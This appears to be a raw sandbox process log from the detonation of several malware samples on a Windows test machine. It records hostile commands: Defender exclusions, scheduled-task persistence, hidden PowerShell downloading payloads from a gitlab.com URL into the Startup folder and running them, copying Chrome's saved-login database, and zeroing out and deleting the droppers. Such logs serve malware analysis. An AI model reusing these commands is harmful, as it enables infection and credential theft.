"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\ClWWWrRvtgVoLl.exe"

C:\Users\Admin\AppData\Local\Temp\funqkvhlditfbjgrn.exe

"C:\Users\Admin\AppData\Local\Temp\funqkvhlditfbjgrn.exe"

C:\Users\Admin\Desktop\2023-09-04\532021fc0305c2e6744cccbb73a30f64f7e86584b838e64e537d26bd4ba9dc0c.exe

"C:\Users\Admin\Desktop\2023-09-04\532021fc0305c2e6744cccbb73a30f64f7e86584b838e64e537d26bd4ba9dc0c.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\s1ek.0.bat" "

C:\Users\Admin\Desktop\2023-09-04\c5f256689f11369ee00414214fef56fb6eb22bb623835d676a02dfb561791200.exe

"C:\Users\Admin\Desktop\2023-09-04\c5f256689f11369ee00414214fef56fb6eb22bb623835d676a02dfb561791200.exe"

C:\Users\Admin\Desktop\2023-09-04\ce14e600e9fabbe76c755ebf23c96be8cda1054c4cd00ef0c0d8b3b8e04769ee.exe

"C:\Users\Admin\Desktop\2023-09-04\ce14e600e9fabbe76c755ebf23c96be8cda1054c4cd00ef0c0d8b3b8e04769ee.exe"

C:\Users\Admin\Desktop\2023-09-04\d431132bfaec0893a56532db7da1930c1621deb9ffaf1e56d549220b2b065e23.exe

"C:\Users\Admin\Desktop\2023-09-04\d431132bfaec0893a56532db7da1930c1621deb9ffaf1e56d549220b2b065e23.exe"

C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe

"C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\NzdSupOimejfx.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NzdSupOimejfx" /XML "C:\Users\Admin\AppData\Local\Temp\tmpDF53.tmp"

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Users\Admin\Desktop\2023-09-04\e4d5b043f5c9e0894a5f4a21c93cd7347a609a900da8f56f55a0dd84269e81f1.exe

"C:\Users\Admin\Desktop\2023-09-04\e4d5b043f5c9e0894a5f4a21c93cd7347a609a900da8f56f55a0dd84269e81f1.exe"

C:\Users\Admin\Desktop\2023-09-04\af384052c09f33cf47892ced9ac5de9c7a2cda37ae4aa72c08d54068db5b3284.exe

"C:\Users\Admin\Desktop\2023-09-04\af384052c09f33cf47892ced9ac5de9c7a2cda37ae4aa72c08d54068db5b3284.exe"

C:\Users\Admin\Desktop\2023-09-04\af384052c09f33cf47892ced9ac5de9c7a2cda37ae4aa72c08d54068db5b3284.exe

"C:\Users\Admin\Desktop\2023-09-04\af384052c09f33cf47892ced9ac5de9c7a2cda37ae4aa72c08d54068db5b3284.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c timeout /nobreak /t 3 & fsutil file setZeroData offset=0 length=8217423 "C:\Users\Admin\Desktop\2023-09-04\77939bc55f126f336599f79e2cec371a290be3f17d08ca83344118e97d314f27.exe" & erase "C:\Users\Admin\Desktop\2023-09-04\77939bc55f126f336599f79e2cec371a290be3f17d08ca83344118e97d314f27.exe" & exit

C:\Users\Admin\Desktop\2023-09-04\a163afbf2a38849f7f9f8f39b17af32425d3d03b95b9a3f0af1af42faa0ab138.exe

"C:\Users\Admin\Desktop\2023-09-04\a163afbf2a38849f7f9f8f39b17af32425d3d03b95b9a3f0af1af42faa0ab138.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nnweubxpxnavd.exe /TR "C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe" /F

C:\Windows\SysWOW64\timeout.exe

timeout /nobreak /t 3

C:\ProgramData\presepuesto\LEAJ.exe

"C:\ProgramData\presepuesto\LEAJ.exe"

C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe

C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://gitlab.com/brum/teamfor/-/raw/main/st -OutFile "C:\\Users\\$([Environment]::UserName)\\AppData\\Roaming\\Microsoft\\Windows\\'Start Menu'\\Programs\\Startup\\WindowsSecure.bat";

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd3fbc9758,0x7ffd3fbc9768,0x7ffd3fbc9778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.alibaba.com/

C:\Windows\SysWOW64\fsutil.exe

fsutil file setZeroData offset=0 length=8217423 "C:\Users\Admin\Desktop\2023-09-04\77939bc55f126f336599f79e2cec371a290be3f17d08ca83344118e97d314f27.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /RL HIGHEST /tn "LEAJ" /tr C:\ProgramData\presepuesto\LEAJ.exe /f

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Users\Admin\Desktop\2023-09-04\ce14e600e9fabbe76c755ebf23c96be8cda1054c4cd00ef0c0d8b3b8e04769ee.exe

"C:\Users\Admin\Desktop\2023-09-04\ce14e600e9fabbe76c755ebf23c96be8cda1054c4cd00ef0c0d8b3b8e04769ee.exe"

C:\Users\Admin\Desktop\2023-09-04\ce14e600e9fabbe76c755ebf23c96be8cda1054c4cd00ef0c0d8b3b8e04769ee.exe

"C:\Users\Admin\Desktop\2023-09-04\ce14e600e9fabbe76c755ebf23c96be8cda1054c4cd00ef0c0d8b3b8e04769ee.exe"

C:\Users\Admin\Desktop\2023-09-04\d431132bfaec0893a56532db7da1930c1621deb9ffaf1e56d549220b2b065e23.exe

"C:\Users\Admin\Desktop\2023-09-04\d431132bfaec0893a56532db7da1930c1621deb9ffaf1e56d549220b2b065e23.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\2023-09-04\c5f256689f11369ee00414214fef56fb6eb22bb623835d676a02dfb561791200.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\NIebSjcCgFnY.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NIebSjcCgFnY" /XML "C:\Users\Admin\AppData\Local\Temp\tmp8D37.tmp"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\ProgramData\presepuesto\LEAJ.exe

C:\ProgramData\presepuesto\LEAJ.exe

C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe

C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd45b346f8,0x7ffd45b34708,0x7ffd45b34718

C:\Users\Admin\AppData\Local\Temp\hmvxuotfje.exe

"C:\Users\Admin\AppData\Local\Temp\hmvxuotfje.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2800 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4960 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4920 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4192 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5244 /prefetch:1

C:\Users\Admin\Desktop\2023-09-04\9025cbcf8f758c9c16cf199ecd45576f61b00921701829343a607336b8e9a2cb.exe

"C:\Users\Admin\Desktop\2023-09-04\9025cbcf8f758c9c16cf199ecd45576f61b00921701829343a607336b8e9a2cb.exe"

C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe

C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://gitlab.com/brum/teamfor/-/raw/main/Document.zip -OutFile C:\\Users\\Public\\Document.zip;

C:\Users\Admin\AppData\Local\Temp\egvwnmlaao.exe

"C:\Users\Admin\AppData\Local\Temp\egvwnmlaao.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c timeout /nobreak /t 3 & fsutil file setZeroData offset=0 length=7269015 "C:\Users\Admin\Desktop\2023-09-04\e4d5b043f5c9e0894a5f4a21c93cd7347a609a900da8f56f55a0dd84269e81f1.exe" & erase "C:\Users\Admin\Desktop\2023-09-04\e4d5b043f5c9e0894a5f4a21c93cd7347a609a900da8f56f55a0dd84269e81f1.exe" & exit

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5360 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5360 /prefetch:8

C:\Windows\SysWOW64\timeout.exe

timeout /nobreak /t 3

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\Users\Public\micros.vbs"

C:\Windows\SysWOW64\fsutil.exe

fsutil file setZeroData offset=0 length=7269015 "C:\Users\Admin\Desktop\2023-09-04\e4d5b043f5c9e0894a5f4a21c93cd7347a609a900da8f56f55a0dd84269e81f1.exe"

C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe

C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Expand-Archive C:\\Users\\Public\\Document.zip -DestinationPath C:\\Users\\Public\\Document;

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5760 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5748 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4920 /prefetch:1

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5332 /prefetch:2

C:\Windows\system32\NETSTAT.EXE

netstat

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6084 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6076 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe

C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\micros.bat" "

C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe

C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://gitlab.com/brum/teamfor/-/raw/main/achung -OutFile C:\\Users\\Public\\Document\\project.py;

C:\ProgramData\presepuesto\LEAJ.exe

C:\ProgramData\presepuesto\LEAJ.exe

C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe

C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden C:\\Users\\Public\\Document\\python C:\\Users\\Public\\Document\\project.py;

C:\Windows\SysWOW64\cmd.exe

/c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V

C:\Program Files\Mozilla Firefox\Firefox.exe

"C:\Program Files\Mozilla Firefox\Firefox.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.alibaba.com/

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd465c9758,0x7ffd465c9768,0x7ffd465c9778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1744 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2084 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3024 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3016 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:8

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\Users\Public\micros.vbs"

C:\Program Files (x86)\Zibvxn\colorcplhhd0qj.exe

"C:\Program Files (x86)\Zibvxn\colorcplhhd0qj.exe"

C:\Program Files (x86)\Zibvxn\colorcplhhd0qj.exe

"C:\Program Files (x86)\Zibvxn\colorcplhhd0qj.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\SysWOW64\cmd.exe"

C:\Program Files (x86)\Zibvxn\colorcplhhd0qj.exe

"C:\Program Files (x86)\Zibvxn\colorcplhhd0qj.exe"

C:\Program Files (x86)\Zibvxn\colorcplhhd0qj.exe

"C:\Program Files (x86)\Zibvxn\colorcplhhd0qj.exe"

C:\Windows\SysWOW64\cmmon32.exe

"C:\Windows\SysWOW64\cmmon32.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\micros.ps1'"

C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe

C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\micros.bat" "

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2784 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:2

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4660 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\micros.ps1'"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4640 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2712 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:8

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\Users\Public\micros.vbs"

C:\ProgramData\presepuesto\LEAJ.exe

C:\ProgramData\presepuesto\LEAJ.exe

C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe

C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1760 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

